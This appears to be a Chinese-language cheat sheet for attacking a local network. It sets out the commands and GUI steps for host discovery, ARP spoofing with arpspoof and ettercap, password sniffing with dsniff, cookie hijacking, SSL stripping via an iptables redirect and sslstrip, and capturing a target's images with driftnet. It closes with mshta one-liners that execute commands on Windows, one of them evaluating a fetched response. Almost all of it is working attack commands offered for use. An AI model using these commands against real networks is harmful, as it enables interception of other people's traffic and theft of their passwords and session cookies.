注:使用arp欺骗时,要开启echo "1" > /proc/sys/net/ipv4/ip_forward /*开启路由转发功能,不开启路由转发而使用后续指令会造成对方断网。*/0x00:
使用工具:fping 安装命令~$sudo apt-get install fping
命令行执行:fping –asg xxx.xxx.xxx.xxx/24
查看网关命令:netstat -rn
/*用来检测内网存活主机*/
0x01:
这里arpspoof 和ettercap随便选之一使用即可(arpspoof系统已自带)
arpspoof -i 网卡名称 -t 路由网关ip 目标ip
注:在arpspoof开启arp欺骗的同时,可以使用dsniff(系统自带)来监听嗅探密码
woobuntu下使用命令行:
sudo dsniff -c -f /usr/share/dsniff/dsniff.services 来开启dsniff的密码嗅探
然后为了方便查看,可以使用cookie cadger 来会话劫持,抓取cookie。
0x02:
使用工具:ettercap
安装命令 ~$sudo apt-get install ettercap-graphical
root权限下打开
ettercap:ettercap -C /*命令窗界面
ettercap -G /*图形化界面
1.以-G 图形化界面为例,打开ettercap之后,选择Sniff—-Unified-sniffing,然后选择网卡
2.然后Hosts—Scan for hosts—Hosts list,此时可以看到内网主机ip
3.选定目标主机,然后点add to target 1,意思是将目标主机添加到目标1;选定路由网关IP,点add to target 2,将路由ip添加到目标2
4.然后点mitm — arp posoning ,勾选sniff remote connections
5.之后start — start sniffing开始监听~点view — connections开始查看连接。
6.ettercap 使用sslstrip插件去ssl嵌套层加密传输壳说明:
编辑etter.conf文件,启用端口转发,命令如下:
~$sudo vi /etc/ettercap/etter.conf /*找到iptables ,去掉注释*/
然后在 防火墙里面添加命令:
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
并启用防火墙,命令:
modprobe ip_tables
通过命令行启动ettercap 进行arp欺骗,命令:
sudo ettercap -Tq -i enp3s0 -M arp:remote /目标IP// /网关IP//
启用sslstrip命令:
sslstrip -l 10000
或者在ettercap插件里面启用sslstrip,开启arp欺骗攻击,就可以脱去ssl嵌套层加密传输壳。
/* 可以以纯命令的方式启动 ettercap -Tq -i enp3s0 //网卡 -T是以文本模式显示,q是以安静模式 */
0x03:
利用ettercap+driftnet截获目标主机的图片数据流
安装命令:~$sudo apt-get install driftnet
1.打开一个终端窗,root权限执行 oxo1 的1-5步
2.driftnet -i 本地网卡名称
0x04:
windows下通过mshta 执行命令:
1.mshta vbscript:CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)
2.mshta javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im mshta.exe",0,true);}其他错误解决办法:
MacOS下运行
sudo ettercap -G之后,会提示
(<unknown>:13540): Gtk-WARNING **: 19:39:22.891: Could not load a pixbuf from /org/gtk/libgtk/theme/Adwaita/assets/check-symbolic.svg.
This may indicate that pixbuf loaders or the mime database could not be found.直接的解决办法就是使用brew安装librsvg即可:
brew install librsvg